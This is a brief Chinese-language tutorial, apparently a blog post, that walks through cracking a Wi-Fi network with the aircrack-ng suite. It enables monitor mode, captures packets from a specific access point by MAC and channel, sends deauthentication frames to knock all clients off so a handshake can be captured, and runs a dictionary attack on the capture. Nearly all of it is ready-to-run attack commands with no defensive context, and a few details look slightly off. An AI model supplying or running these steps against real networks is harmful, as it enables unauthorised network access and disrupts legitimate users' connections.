方法一
airmon工具
1. iwconfig
出现wlan0即可进行之后操作
2. airmon-ng start wlan0 改变网卡模式变为监听模式
airmon-ng stop wlan0mon 关闭监听模式
改变模式之后网卡的名字也随之而变,wlan0mon即为wlan0的
监听模式的名字,之后的网卡名字都要使用这个监听模式的名字。
3. airodump-ng wlan0mon 监听并显示所有AP信息 airodump-ng -C 5180-5885 wlan0mon
4. airodump-ng --ivs -w a --bssid F4:83:CD:C6:E9:CE -c 1 wlan0mon
包名 AP的MAC 信道(CH)
5. aireplay-ng -0 10 –a F4:83:CD:C6:E9:CE wlan0mon 在新的终端窗口输入,使所有设备重新连接AP,以此获得包
AP的MAC
第五步执行后,第四步执行的界面出现[wps handshake:AP的MAC] 即可执行下一步
6. aircrack-ng /root/a-01.ivs -w wordlist.lst 第四步获得一个包为(a-01.ivs)利用字典跑
Comments NOTHING